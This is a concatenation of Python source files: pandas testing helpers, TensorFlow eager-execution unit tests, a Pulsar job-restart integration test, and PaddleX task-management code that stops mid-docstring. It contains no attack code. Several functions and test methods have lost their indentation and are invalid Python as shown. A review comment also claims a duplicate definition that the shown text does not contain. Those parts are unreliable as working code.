                    # warning must point at the caller's file, i.e. was
                    # emitted with a correct stacklevel
                    caller = getframeinfo(stack()[2][0])
                    msg = (
                        "Warning not set with correct stacklevel. "
                        "File where warning is raised: {actual} != "
                        "{caller}. Warning message: {message}"
                    ).format(
                        actual=actual_warning.filename,
                        caller=caller.filename,
                        message=actual_warning.message,
                    )
                    assert actual_warning.filename == caller.filename, msg
            else:
                extra_warnings.append(
                    (
                        actual_warning.category.__name__,
                        actual_warning.message,
                        actual_warning.filename,
                        actual_warning.lineno,
                    )
                )
        if expected_warning:
            msg = "Did not see expected warning of class {name!r}.".format(
                name=expected_warning.__name__
            )
            assert saw_warning, msg
        if raise_on_extra_warnings and extra_warnings:
            raise AssertionError(
                "Caused unexpected warning(s): {!r}.".format(extra_warnings)
            )
class RNGContext:
    """
    Context manager that seeds numpy's global RNG on entry and restores
    the previous generator state on exit.

    Parameters
    ----------
    seed : int
        Seed for numpy.random.seed

    Examples
    --------
    with RNGContext(42):
        np.random.randn()
    """

    def __init__(self, seed):
        self.seed = seed

    def __enter__(self):
        # capture the complete generator state so exit can restore it
        self.start_state = np.random.get_state()
        np.random.seed(self.seed)

    def __exit__(self, exc_type, exc_value, traceback):
        np.random.set_state(self.start_state)
@contextmanager
def with_csv_dialect(name, **kwargs):
    """
    Context manager to temporarily register a CSV dialect for parsing CSV.

    Parameters
    ----------
    name : str
        The name of the dialect.
    kwargs : mapping
        The parameters for the dialect.

    Raises
    ------
    ValueError : the name of the dialect conflicts with a builtin one.

    See Also
    --------
    csv : Python's CSV library.
    """
    import csv

    _BUILTIN_DIALECTS = {"excel", "excel-tab", "unix"}

    if name in _BUILTIN_DIALECTS:
        raise ValueError("Cannot override builtin dialect.")

    csv.register_dialect(name, **kwargs)
    try:
        yield
    finally:
        # bug fix: unregister even when the managed block raises, so the
        # temporary dialect cannot leak into later tests
        csv.unregister_dialect(name)
@contextmanager
def use_numexpr(use, min_elements=None):
    """
    Context manager to temporarily toggle numexpr-backed evaluation in pandas.

    Parameters
    ----------
    use : bool
        Whether expressions should be evaluated via numexpr.
    min_elements : int, optional
        Temporary value for ``expr._MIN_ELEMENTS``; defaults to the
        current setting.
    """
    from pandas.core.computation import expressions as expr

    if min_elements is None:
        min_elements = expr._MIN_ELEMENTS

    olduse = expr._USE_NUMEXPR
    oldmin = expr._MIN_ELEMENTS
    expr.set_use_numexpr(use)
    expr._MIN_ELEMENTS = min_elements
    try:
        yield
    finally:
        # bug fix: restore the prior settings even when the managed block
        # raises; previously an exception left the global flags modified
        expr._MIN_ELEMENTS = oldmin
        expr.set_use_numexpr(olduse)
def test_parallel(num_threads=2, kwargs_list=None):
    """Decorator to run the same function multiple times in parallel.

    Parameters
    ----------
    num_threads : int, optional
        The number of times the function is run in parallel.
    kwargs_list : list of dicts, optional
        The list of kwargs to update original
        function kwargs on different threads.

    Notes
    -----
    This decorator does not pass the return value of the decorated function.

    Original from scikit-image:
    https://github.com/scikit-image/scikit-image/pull/1519
    """
    assert num_threads > 0
    has_kwargs_list = kwargs_list is not None
    if has_kwargs_list:
        assert len(kwargs_list) == num_threads
    import threading

    def wrapper(func):
        @wraps(func)
        def inner(*args, **kwargs):
            def kwargs_for(i):
                # per-thread kwargs: overlay kwargs_list[i] when provided
                if has_kwargs_list:
                    return dict(kwargs, **kwargs_list[i])
                return kwargs

            threads = [
                threading.Thread(target=func, args=args, kwargs=kwargs_for(i))
                for i in range(num_threads)
            ]
            for t in threads:
                t.start()
            for t in threads:
                t.join()

        return inner

    return wrapper
class SubclassedSeries(Series):
    # Series subclass used to verify that metadata and subclass type
    # survive pandas operations.
    _metadata = ["testattr", "name"]  # attributes propagated to results

    @property
    def _constructor(self):
        # same-dimension results stay SubclassedSeries
        return SubclassedSeries

    @property
    def _constructor_expanddim(self):
        # dimension-expanding ops (e.g. to_frame) yield the DataFrame subclass
        return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
    # DataFrame subclass used to verify that metadata and subclass type
    # survive pandas operations.
    _metadata = ["testattr"]  # attributes propagated to results

    @property
    def _constructor(self):
        # same-dimension results stay SubclassedDataFrame
        return SubclassedDataFrame

    @property
    def _constructor_sliced(self):
        # slicing to one dimension yields the Series subclass
        return SubclassedSeries
class SubclassedCategorical(Categorical):
    # Categorical subclass used to verify subclass preservation.
    @property
    def _constructor(self):
        return SubclassedCategorical
@contextmanager
def set_timezone(tz):
    """Context manager for temporarily setting a timezone.

    Parameters
    ----------
    tz : str
        A string representing a valid timezone.

    Examples
    --------
    >>> from datetime import datetime
    >>> from dateutil.tz import tzlocal
    >>> tzlocal().tzname(datetime.now())
    'IST'

    >>> with set_timezone('US/Eastern'):
    ...     tzlocal().tzname(datetime.now())
    ...
    'EDT'
    """
    import os
    import time

    def _apply(zone):
        # zone=None means "no TZ variable at all"
        if zone is None:
            os.environ.pop("TZ", None)
        else:
            os.environ["TZ"] = zone
        time.tzset()

    previous = os.environ.get("TZ")
    _apply(tz)
    try:
        yield
    finally:
        _apply(previous)
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
skipna_wrapper : function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
def convert_rows_list_to_csv_str(rows_list):
    """
    Convert list of CSV rows to single CSV-formatted string for current OS.

    This method is used for creating expected value of to_csv() method.

    Parameters
    ----------
    rows_list : list
        The list of string. Each element represents the row of csv.

    Returns
    -------
    expected : string
        Expected output of to_csv() in current OS
    """
    terminator = os.linesep
    return terminator.join(rows_list) + terminator
|
core_test.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for core."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import execute
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import test_util
def truncated_normal(shape):
  """Sample a float32 truncated-normal tensor of `shape` via raw eager execute."""
  attrs = ('dtype', dtypes.float32.as_datatype_enum, 'T',
           shape.dtype.as_datatype_enum, 'seed', 0, 'seed2', 0)
  outputs = execute.execute(b'TruncatedNormal', 1, inputs=[shape], attrs=attrs)
  return outputs[0]
class TFETest(test_util.TensorFlowTestCase):
  def testContext(self):
    """Smoke-tests basic Context attributes and nested device scoping."""
    ctx = context.Context()
    # a freshly created Context defaults to eager (not graph) mode
    self.assertFalse(ctx.in_graph_mode())
    self.assertTrue(ctx.in_eager_mode())
    self.assertEqual('', ctx.scope_name)
    ctx.scope_name = 'foo'
    self.assertEqual('foo', ctx.scope_name)
    self.assertIsNone(ctx.summary_writer_resource)
    ctx.summary_writer_resource = 'mock'
    self.assertEqual('mock', ctx.summary_writer_resource)
    # default device is empty; device_spec must always agree with device_name
    self.assertEqual('', ctx.device_name)
    self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
    with ctx.device('GPU:0'):
      self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
                       ctx.device_name)
      self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
      # device(None) inside a device scope resets to the default device
      with ctx.device(None):
        self.assertEqual('', ctx.device_name)
        self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
        with ctx.device('CPU:0'):
          self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
                           ctx.device_name)
          self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
    # at least one CPU device must always be listed
    has_cpu_device = False
    for x in ctx.devices():
      has_cpu_device = has_cpu_device or 'CPU' in x
    self.assertTrue(has_cpu_device)
    del ctx
def _runInThread(self, target, args):
t = threading.Thread(target=target, args=args)
try:
t.start()
t.join()
except Exception as e:
raise e
  # Test that different thread local values are initialized to the same values
  # in different threads.
  def testContextThreadLocalMembers(self):
    """Thread-local Context members must start out equal across threads."""
    def get_context_values(ctx):
      # snapshot of every thread-local member of the Context
      return [
          ctx.in_graph_mode(),
          ctx.in_eager_mode(), ctx.scope_name, ctx.summary_writer_resource,
          ctx.device_name, ctx.num_gpus()
      ]
    def get_values(ctx, values):
      values.extend(get_context_values(ctx))
    context_values = []
    ctx = context.Context()
    # read the values from a second thread and compare to this thread's view
    self._runInThread(get_values, (ctx, context_values))
    self.assertAllEqual(context_values, get_context_values(ctx))
def testContextConfig(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
ctx = context.Context(config=config_pb2.ConfigProto(
device_count={'GPU': 0}))
self.assertEquals(0, ctx.num_gpus())
def testTensorPlacement(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
x = constant_op.constant(1.).as_gpu_tensor()
with context.device('gpu:0'):
y = constant_op.constant(2.)
# Add would fail if t2 were not on GPU
result = execute.execute(
b'Add', 1, inputs=[x, y],
attrs=('T', x.dtype.as_datatype_enum))[0].as_cpu_tensor().numpy()
self.assertEqual(3, result)
def testCopyBetweenDevices(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.as_cpu_tensor()
x = x.as_gpu_tensor()
x = x.as_gpu_tensor()
x = x.as_cpu_tensor()
# Invalid device
with self.assertRaises(errors.InvalidArgumentError):
x.as_gpu_tensor(context.context().num_gpus() + 1)
def testNumpyForceCPU(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
cpu = constant_op.constant([[1., 2.], [3., 4.]])
c2g = cpu.as_gpu_tensor()
self.assertAllEqual(c2g.numpy(), cpu.numpy())
def testCopyFromCPUToCPU(self):
ta = constant_op.constant([[1, 2], [3, 4]])
tb = ta.as_cpu_tensor()
self.assertNotEqual(ta._handle, tb._handle)
self.assertAllEqual(ta.numpy(), tb.numpy())
def testRegisterExceptionClass(self):
with self.assertRaises(TypeError):
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(str)
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(core._NotOkStatusException) # pylint: disable=protected-access
# TODO(agarwal): add tests passing incorrect typed values to attrs.
def testExecuteBasic(self):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute.execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertEqual(15, product.numpy())
def testExecuteTooManyNumOutputs(self):
# num_outputs provided is 50, but only one output is produced.
# That should be okay.
product = execute.execute(
b'Mul',
num_outputs=50,
inputs=[constant_op.constant(3), constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
self.assertEqual(15, product.numpy())
def testMatMulGPU(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
three = constant_op.constant([[3.]]).as_gpu_tensor()
five = constant_op.constant([[5.]]).as_gpu_tensor()
product = execute.execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertEqual([[15.0]], product.numpy())
def testExecuteStringAttr(self):
checked_three = execute.execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 'just checking', 'T',
dtypes.float32.as_datatype_enum))[0]
self.assertEqual([[3]], checked_three.numpy())
def testExecuteStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute.execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 1, 'T', dtypes.float32.as_datatype_enum))
def testExecuteFloatAttr(self):
almost_equal = execute.execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', 0.3, 'T', dtypes.float32.as_datatype_enum))[0]
self.assertTrue(almost_equal.numpy())
def testExecuteFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute.execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', '0.3', 'T', dtypes.float32.as_datatype_enum))
def testExecuteIntAttr(self):
total = execute.execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', 2))[0]
self.assertEqual(7, total.numpy())
def testExecuteIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute.execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', '2'))
# Looks like we don't have an existing op with list(bool) attrs.
def testExecuteBoolAttr(self):
product = execute.execute(
b'MatMul',
num_outputs=1,
inputs=[constant_op.constant([[3]]),
constant_op.constant([[5]])],
attrs=('transpose_a', True, 'transpose_b', False, 'T',
dtypes.int32.as_datatype_enum))[0]
self.assertEqual([[15]], product.numpy())
def testExecuteShapeAttr(self):
execute.execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [1, 2], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute.execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', 1, 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteListStringAttr(self):
execute.execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description',
'tensor_summary', 'labels', ['3',
'summary'], 'display_name', 'test'))
def testExecuteListStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute.execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', 3, 'display_name', 'test'))
def testExecuteListStringAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute.execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', [3], 'display_name', 'test'))
def testExecuteListFloatAttr(self):
b = execute.execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', [4.0,
6.0]))[0]
self.assertAllEqual([0, 1, 2], b.numpy())
def testExecuteListFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute.execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', 4.0))
def testExecuteListFloatAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute.execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries',
['4.0', '6.0']))
def testExecuteListIntAttr(self):
b = execute.execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', [0, 2]))[0]
self.assertAllEqual([3], b.numpy())
def testExecuteListIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute.execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', 0))
def testExecuteListIntAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute.execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims',
['0', '2']))
def testExecuteListTypeListShapeAttr(self):
execute.execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute.execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', dtypes.float64.as_datatype_enum, 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute.execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', '1', 'shapes', [[1, 2]], 'capacity', -1,
'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute.execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1, 2], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute.execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteMultipleOutputs(self):
split_dim = 1
value = [[0, 1, 2], [3, 4, 5]]
x1, x2, x3 = execute.execute(
b'Split',
num_outputs=3,
inputs=[constant_op.constant(split_dim),
constant_op.constant(value)],
attrs=('num_split', 3, 'T', dtypes.int32.as_datatype_enum))
self.assertAllEqual([[0], [3]], x1.numpy())
self.assertAllEqual([[1], [4]], x2.numpy())
self.assertAllEqual([[2], [5]], x3.numpy())
def testExecuteBadNumOutputsArgument(self):
with self.assertRaises(TypeError):
execute.execute(
b'Relu', [],
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum))
def testExecuteUnknownOp(self):
with self.assertRaises(errors.NotFoundError):
execute.execute(b'BlahBlahBlah', num_outputs=1, inputs=[], attrs=None)
def testExecuteUnknownAttr(self):
with self.assertRaises(errors.InvalidArgumentError):
execute.execute(
b'Identity',
num_outputs=1,
inputs=[constant_op.constant(3)],
attrs=('T', dtypes.int32.as_datatype_enum, 'unknown_attr', 'blah'))
def testComposition(self):
def add(x, y):
return execute.execute(
b'Add',
num_outputs=1,
inputs=[x, y],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
x = constant_op.constant(1)
three_x = add(add(x, x), x)
self.assertEquals(dtypes.int32, three_x.dtype)
self.assertEquals(3, three_x.numpy())
def testOperationWithNoInputsRunsOnDevice(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
shape = constant_op.constant([], dtype=dtypes.int32)
# x: Run the "TruncatedNormal" op CPU and copy result to GPU.
x = truncated_normal(shape).as_gpu_tensor()
# y: Explicitly run the "TruncatedNormal" op on GPU.
with context.device('gpu:0'):
y = truncated_normal(shape)
# Add would fail if x and y were not on the same device.
execute.execute(
b'Add', 1, inputs=[x, y], attrs=('T', x.dtype.as_datatype_enum))
def testInvalidDevice(self):
with self.assertRaises(ValueError):
with context.device('pu:0'):
_ = constant_op.constant(1)
# Standard TensorFlow test entry point: discover and run the tests above.
if __name__ == '__main__':
  test.main()
|
integration_test_restart.py | import contextlib
import threading
import time
from .test_utils import (
TempDirectoryTestCase,
skip_unless_module,
skip_without_drmaa,
restartable_pulsar_app_provider,
integration_test,
)
from pulsar.manager_endpoint_util import (
submit_job,
)
from pulsar.managers.stateful import ActiveJobs
from pulsar.client.amqp_exchange_factory import get_exchange
from pulsar.managers.util.drmaa import DrmaaSessionFactory
class RestartTestCase(TempDirectoryTestCase):
    """Integration tests that a restarted Pulsar app recovers queued jobs.

    Each test runs a message-queue-backed manager, tears the app down,
    restarts it, and asserts exactly one terminal status update is published.
    """

    @skip_without_drmaa
    @skip_unless_module("kombu")
    @integration_test
    def test_restart_finishes_job(self):
        # Submit a long-running job, kill it out-of-band via DRMAA, then
        # restart the app and expect a single "complete" status message.
        with self._setup_app_provider("restart_and_finish") as app_provider:
            job_id = '12345'

            with app_provider.new_app() as app:
                manager = app.only_manager
                job_info = {
                    'job_id': job_id,
                    'command_line': 'sleep 1000',
                    'setup': True,
                }
                submit_job(manager, job_info)
                external_id = None
                # Poll briefly until DRMAA assigns an external id to the job.
                for i in range(10):
                    time.sleep(.05)
                    # TODO: unfortunate breaking of abstractions here.
                    external_id = manager._proxied_manager._external_id(job_id)
                    if external_id:
                        break
                if external_id is None:
                    # NOTE(review): "exteranl" below is a typo for "external".
                    assert False, "Test failed, couldn't get exteranl id for job id."
                drmaa_session = DrmaaSessionFactory().get()
                drmaa_session.kill(external_id)
                drmaa_session.close()

            consumer = self._status_update_consumer("restart_and_finish")
            consumer.start()

            with app_provider.new_app() as app:
                consumer.wait_for_messages()

            consumer.join()

            assert len(consumer.messages) == 1, len(consumer.messages)
            assert consumer.messages[0]["status"] == "complete"

    @skip_unless_module("drmaa")
    @skip_unless_module("kombu")
    @integration_test
    def test_recovery_failure_fires_lost_status(self):
        # Activate a job id that never existed; recovery after restart must
        # fail and publish a single "lost" status message.
        test = "restart_and_finish"
        with self._setup_app_provider(test) as app_provider:
            job_id = '12345'

            with app_provider.new_app() as app:
                persistence_directory = app.persistence_directory

            # Break some abstractions to activate a job that
            # never existed.
            manager_name = "manager_%s" % test
            active_jobs = ActiveJobs(manager_name, persistence_directory)
            active_jobs.activate_job(job_id)

            consumer = self._status_update_consumer(test)
            consumer.start()

            with app_provider.new_app() as app:
                consumer.wait_for_messages()

            consumer.join()

            assert len(consumer.messages) == 1, len(consumer.messages)
            assert consumer.messages[0]["status"] == "lost"

    @contextlib.contextmanager
    def _setup_app_provider(self, test):
        # Each test gets its own in-memory broker URL and manager name.
        mq_url = "memory://test_%s" % test
        manager = "manager_%s" % test
        app_conf = dict(message_queue_url=mq_url)
        app_conf["managers"] = {manager: {'type': 'queued_drmaa'}}
        with restartable_pulsar_app_provider(app_conf=app_conf, web=False) as app_provider:
            yield app_provider

    def _status_update_consumer(self, test):
        # Consumer bound to the same in-memory broker as the app under test.
        mq_url = "memory://test_%s" % test
        manager = "manager_%s" % test
        consumer = SimpleConsumer(queue="status_update", url=mq_url, manager=manager)
        return consumer
class SimpleConsumer(object):
    """Collects message bodies published to a queue on a kombu exchange.

    A background thread consumes until ``join`` is called; received bodies
    accumulate in ``self.messages``.
    """

    def __init__(self, queue, url, manager="_default_"):
        self.queue = queue
        self.url = url
        self.manager = manager
        self.active = True
        self.exchange = get_exchange(url, manager, {})
        self.messages = []

    def start(self):
        """Start consuming on a background thread."""
        t = threading.Thread(target=self._run)
        t.start()
        self.thread = t

    def join(self):
        """Signal the consume loop to stop and wait up to 10s for the thread."""
        self.active = False
        self.thread.join(10)

    def wait_for_messages(self, n=1):
        """Block until at least ``n`` messages arrived or ~3s elapsed.

        Raises:
            Exception: if the timeout is exceeded.
        """
        accumulate_time = 0.0
        while len(self.messages) < n:
            time.sleep(.1)
            # Bug fix: previously accumulated 0.05 per 0.1s sleep, making the
            # effective timeout ~6s instead of the intended 3s.
            accumulate_time += 0.1
            if accumulate_time > 3.0:
                raise Exception("Waited too long for messages.")

    def _run(self):
        self.exchange.consume("status_update", self._callback, check=self)

    def _callback(self, body, message):
        self.messages.append(body)
        message.ack()

    def __nonzero__(self):
        # The exchange's consume loop truth-tests `check` (this object) to
        # decide whether to keep running.
        return self.active

    __bool__ = __nonzero__  # Both needed Py2 v 3
|
task.py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .. import workspace_pb2 as w
import os
import os.path as osp
import shutil
import time
import pickle
import json
import multiprocessing as mp
from ..utils import set_folder_status, TaskStatus, get_folder_status, is_available, get_ip
from .train.params import ClsParams, DetParams, SegParams
def create_task(data, workspace):
    """Create a task from a request.

    Args:
        data: dict whose keys include
            'pid': id of the owning project.
            'train': training parameters (JSON string); training and
                data-augmentation parameters are pickled to params.pkl in the
                task directory.
            'parent_id' (optional): parent task of this pruning-training task.
            'desc' (optional): task description.
        workspace: workspace object holding projects/datasets/tasks registries.

    Returns:
        {'status': 1, 'tid': <new task id>}
    """
    create_time = time.time()
    time_array = time.localtime(create_time)
    create_time = time.strftime("%Y-%m-%d %H:%M:%S", time_array)
    id = workspace.max_task_id + 1
    workspace.max_task_id = id
    # Task ids are zero-padded to 4 digits below 10000 ('T0042'), plain above.
    if id < 10000:
        id = 'T%04d' % id
    else:
        id = 'T{}'.format(id)
    pid = data['pid']
    assert pid in workspace.projects, "【任务创建】项目ID'{}'不存在.".format(pid)
    assert not id in workspace.tasks, "【任务创建】任务ID'{}'已经被占用.".format(id)
    did = workspace.projects[pid].did
    assert did in workspace.datasets, "【任务创建】数据集ID'{}'不存在".format(did)
    path = osp.join(workspace.projects[pid].path, id)
    if not osp.exists(path):
        os.makedirs(path)
    set_folder_status(path, TaskStatus.XINIT)
    data['task_type'] = workspace.projects[pid].type
    data['dataset_path'] = workspace.datasets[did].path
    data['pretrain_weights_download_save_dir'] = osp.join(workspace.path,
                                                          'pretrain')
    # Parse the JSON training params into the project-type-specific object.
    if 'train' in data:
        params_json = json.loads(data['train'])
        if (data['task_type'] == 'classification'):
            params_init = ClsParams()
        if (data['task_type'] == 'detection' or
                data['task_type'] == 'instance_segmentation'):
            params_init = DetParams()
        if (data['task_type'] == 'segmentation' or
                data['task_type'] == 'remote_segmentation'):
            params_init = SegParams()
        params_init.load_from_dict(params_json)
        data['train'] = params_init
    parent_id = ''
    if 'parent_id' in data:
        # Pruning task: inherit the training params of the parent task.
        data['tid'] = data['parent_id']
        parent_id = data['parent_id']
        assert data['parent_id'] in workspace.tasks, "【任务创建】裁剪任务创建失败".format(
            data['parent_id'])
        r = get_task_params(data, workspace)
        train_params = r['train']
        data['train'] = train_params
    desc = ""
    if 'desc' in data:
        desc = data['desc']
    with open(osp.join(path, 'params.pkl'), 'wb') as f:
        pickle.dump(data, f)
    task = w.Task(
        id=id,
        pid=pid,
        path=path,
        create_time=create_time,
        parent_id=parent_id,
        desc=desc)
    workspace.tasks[id].CopyFrom(task)
    with open(os.path.join(path, 'info.pb'), 'wb') as f:
        f.write(task.SerializeToString())
    return {'status': 1, 'tid': id}
def delete_task(data, workspace):
    """Delete a task and remove its on-disk directory.

    Args:
        data: dict with key 'tid' (task id).
        workspace: workspace registry holding task metadata.

    Returns:
        {'status': 1}
    """
    tid = data['tid']
    assert tid in workspace.tasks, "任务ID'{}'不存在.".format(tid)
    task_dir = workspace.tasks[tid].path
    if osp.exists(task_dir):
        shutil.rmtree(task_dir)
    del workspace.tasks[tid]
    return {'status': 1}
def get_task_params(data, workspace):
    """Return the training parameters stored for a task.

    NOTE(review): this function is defined twice in this module with an
    identical body; the later definition shadows this one at import time.
    One of the two copies should be removed.

    Args:
        data: dict with key 'tid' (task id).
    Returns:
        {'status': 1, 'train': <params object unpickled from params.pkl>}
    """
    tid = data['tid']
    assert tid in workspace.tasks, "【任务创建】任务ID'{}'不存在.".format(tid)
    path = workspace.tasks[tid].path
    with open(osp.join(path, 'params.pkl'), 'rb') as f:
        task_params = pickle.load(f)
    return {'status': 1, 'train': task_params['train']}
def list_tasks(data, workspace):
    """List tasks, optionally filtered by project id.

    Args:
        data: dict or None; optional key 'pid' restricts results to one
            project.
        workspace: workspace registry.
    Returns:
        {'status': 1, 'tasks': [<attr dict per task>]}
    """
    # Bug fix: this import was previously executed inside the loop on every
    # iteration; hoist it to run once.
    from .operate import get_task_status
    task_list = list()
    for key in workspace.tasks:
        task = workspace.tasks[key]
        # Apply the project filter before doing per-task filesystem work.
        if data is not None and "pid" in data and data["pid"] != task.pid:
            continue
        status, message = get_task_status(task.path)
        attr = {
            "id": task.id,
            "name": task.name,
            "desc": task.desc,
            "pid": task.pid,
            "path": task.path,
            "create_time": task.create_time,
            "status": status.value,
            'type': workspace.projects[task.pid].type
        }
        task_list.append(attr)
    return {'status': 1, 'tasks': task_list}
def set_task_params(data, workspace):
    """Overwrite a task's training parameters.

    Only valid while the task is still in TaskStatus.XINIT; the updated
    params are pickled back into the task's params.pkl.

    Args:
        data: dict with keys 'tid' (task id) and 'train' (JSON string of
            training parameters).
    Returns:
        {'status': 1}
    """
    tid = data['tid']
    train = data['train']
    assert tid in workspace.tasks, "【任务创建】任务ID'{}'不存在.".format(tid)
    path = workspace.tasks[tid].path
    status = get_folder_status(path)
    assert status == TaskStatus.XINIT, "该任务不在初始化阶段,设置参数失败"
    pkl_file = osp.join(path, 'params.pkl')
    with open(pkl_file, 'rb') as f:
        task_params = pickle.load(f)
    task_params['train'].load_from_dict(json.loads(train))
    with open(pkl_file, 'wb') as f:
        pickle.dump(task_params, f)
    return {'status': 1}
def get_default_params(data, workspace, machine_info):
    """Compute recommended default training parameters for a project.

    Defaults depend on project type, dataset size and available GPU memory.

    Args:
